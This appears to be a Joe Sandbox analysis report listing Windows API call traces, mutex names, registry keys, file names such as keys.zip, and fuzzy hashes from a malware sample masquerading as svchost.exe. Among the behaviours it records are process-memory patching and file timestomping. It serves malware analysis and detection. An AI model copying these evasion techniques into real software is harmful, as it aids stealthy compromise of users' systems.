                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: 5e8dc1e5$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
                                                                                                                                                                                                                • API String ID: 849374196-2113155645
                                                                                                                                                                                                                • Opcode ID: 798dcde6366fb78fb56923f242d7e34664e4f258f3f705e974bd65ce0d2f7648
                                                                                                                                                                                                                • Instruction ID: e94a40f4cd1d393937e57cbcc75f930235ef23bfc0bf36ded8e4883bfc7c279c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 798dcde6366fb78fb56923f242d7e34664e4f258f3f705e974bd65ce0d2f7648
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4101F932EC83142BF31297A0AC4DF6AB388AF04F54F544505FD45A63C0DBE49C558AB5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D3C69C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3C6A9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C6BD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3C6CF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3C6DE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C6E5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC08D,BSS), ref: 02D3C6FF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3C705
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 5E8DC08D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                                • API String ID: 3206501308-1397768872
                                                                                                                                                                                                                • Opcode ID: fab6c6dd419d1190be567a0c3c50389d74b8c72c905aba9bbda3ef8a325188bd
                                                                                                                                                                                                                • Instruction ID: ab0bd148da1fe08d5b4ba7fc8eb6a65652f850b53f2e8b2df16521305c9359a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fab6c6dd419d1190be567a0c3c50389d74b8c72c905aba9bbda3ef8a325188bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE01F730DD8711ABE3126B60EC0DF1A37586B09B64F504605F982B13C0EBF4AC14C779
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D282FE
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02D28306
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D2831E
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 02D28332
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000002), ref: 02D2833A
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(winmm.dll,waveOutOpen), ref: 02D2834A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D28351
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000006,00000000), ref: 02D28373
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$AddressCreateCurrentErrorLibraryLoadMemoryModeMutexProcWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: Global\HighMemoryEvent_%08x$waveOutOpen$winmm.dll
                                                                                                                                                                                                                • API String ID: 45796355-4231559177
                                                                                                                                                                                                                • Opcode ID: 10d2d3d803a5fac95b324573bfdc0debb532181bb858d1e8e0268f26a8dded49
                                                                                                                                                                                                                • Instruction ID: c57cef42545b664187a59fd662ec1a1317ed6f1ea55eab0d32fabbd137923a9c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10d2d3d803a5fac95b324573bfdc0debb532181bb858d1e8e0268f26a8dded49
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82012171984204BBE710ABD4AD0EFA97728AB15705F804688F645A52C0D7F55EA48FB1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 46de6c981ec463d2e5bdf47b3dbb71812d2e32cdf3826812047de354e22c9ce0
                                                                                                                                                                                                                • Instruction ID: 0d6b704f6b2154140d444fef1ecfce3baeea6ddaecb2e40bddf6c890b8f775c4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46de6c981ec463d2e5bdf47b3dbb71812d2e32cdf3826812047de354e22c9ce0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EC1C531A046179FCB16CF68C8A4BAEB7B5FF4A354B144254EC999B344D731EE05CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D27A0A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27A41
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27A59
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02D27A7B
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02D27AA1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27B43
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,74DEF380), ref: 02D27B73
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4189572443-3673152959
                                                                                                                                                                                                                • Opcode ID: 8c254a3998ae1bb691d7fc409b14856a414a25ed51c58b4dd084c8820842de16
                                                                                                                                                                                                                • Instruction ID: afefe4af31a9b6944c7f0e7b4aa0dabe30333b71daba9bd3b0339b4c40f72e27
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c254a3998ae1bb691d7fc409b14856a414a25ed51c58b4dd084c8820842de16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0412A71A4015D6BEB24DB74DC98EFEF7A9EB64308F0045A8E545D3340E3708E88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D4339D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7CF94,?,?), ref: 02D43437
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D434A6
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D434B3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D434E7
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D434F8
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D434FF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashFileMutexPath$AttributesCreateDeleteReleaseSleep
                                                                                                                                                                                                                • String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$keys.zip$keys_path.txt
                                                                                                                                                                                                                • API String ID: 1512046866-380397883
                                                                                                                                                                                                                • Opcode ID: ebbf73bd30c1a33e32579384629c72541e67a2b91a75ed38a249f7ee5a19ba81
                                                                                                                                                                                                                • Instruction ID: ea8a39e5e4b16e019c5f1ed2206361c1d51c7d52635524b3e6a0cefaa0e76fbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebbf73bd30c1a33e32579384629c72541e67a2b91a75ed38a249f7ee5a19ba81
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C4119309442594FCB16CB28A8ACBEABBE1EF95300F5485D5D889D7350EF319D49CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D313E3
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D313FB
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,74DEF550,74DF1620), ref: 02D3141C
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(80000002,A1633E89a,00000000,00000001,?,00000104,?,?,?,?,74DEF550,74DF1620), ref: 02D31443
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,74DEF550,74DF1620), ref: 02D314CD
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,74DEF550,74DF1620), ref: 02D314D4
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D314E3
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000002,?,?,?,?,74DEF550,74DF1620), ref: 02D31513
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: A1633E89a$software\microsoft
                                                                                                                                                                                                                • API String ID: 4158279268-640965002
                                                                                                                                                                                                                • Opcode ID: 2c0809bf5ff6f7fc5cea1040b254c773abe4b0de2438b45698d0ef349dc11914
                                                                                                                                                                                                                • Instruction ID: 255e7871cd7372040dd86fe5d8326cf76b26f9fa4d0132f9ac7f680e3d274bbc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c0809bf5ff6f7fc5cea1040b254c773abe4b0de2438b45698d0ef349dc11914
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9641177294015E6BDB25DBB4DC98BEE77B9EF49304F4045A8E549D3240E370CE88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,7604DB30,00000000,00000000), ref: 00401A06
                                                                                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,7604DB30,00000000,00000000), ref: 00401A29
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A4A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A6E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                • String ID: ?+@$D
                                                                                                                                                                                                                • API String ID: 2248944234-1654856090
                                                                                                                                                                                                                • Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
                                                                                                                                                                                                                • Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
                                                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
                                                                                                                                                                                                                • API String ID: 1046229350-2079472752
                                                                                                                                                                                                                • Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
                                                                                                                                                                                                                • Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32277
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02D3228E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D3229B
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D322D7
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(02D79F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02D32301
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32310
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32313
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32320
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32323
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID: a1633ec9a
                                                                                                                                                                                                                • API String ID: 780088666-972184491
                                                                                                                                                                                                                • Opcode ID: ebe72e13dcde2d0e3c106da71e5585774172313dd9f62e84daeadf7c8c78871d
                                                                                                                                                                                                                • Instruction ID: 7967c179fee58a6c5a0a29321f717e7d086c295fe113d91ce51cf66d5923fcb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebe72e13dcde2d0e3c106da71e5585774172313dd9f62e84daeadf7c8c78871d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1111E431A8021567D7215628AC1DFEB7B69EB41B01F840544F9C5EB3C0DEE19CD4CAE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
                                                                                                                                                                                                                  • Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
                                                                                                                                                                                                                  • Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
                                                                                                                                                                                                                  • Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
                                                                                                                                                                                                                  • Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
                                                                                                                                                                                                                  • Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 02D44FFE
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D45012
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45023
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D45033
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45070
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45073
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45080
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45083
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1866686876-3277137149
                                                                                                                                                                                                                • Opcode ID: 8d9cec74560aaed6cf68f81706b8c612e08307d3858d3a9c58ab2d10b8dedc1a
                                                                                                                                                                                                                • Instruction ID: 421071945fa3c4d5c570cbdc92ae29154e9fb33a48caca38b556be8a650c930e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d9cec74560aaed6cf68f81706b8c612e08307d3858d3a9c58ab2d10b8dedc1a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31118E35A802006BE7209B75BC4CF9B7BA9EF99714F944914FA09D2340DB34DD60CAF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004013C0: CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
                                                                                                                                                                                                                  • Part of subcall function 004013C0: HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
                                                                                                                                                                                                                  • Part of subcall function 004013C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
                                                                                                                                                                                                                  • Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
                                                                                                                                                                                                                  • Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
                                                                                                                                                                                                                  • Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401E23
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401E81
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401E91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1392322707-3277137149
                                                                                                                                                                                                                • Opcode ID: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
                                                                                                                                                                                                                • Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
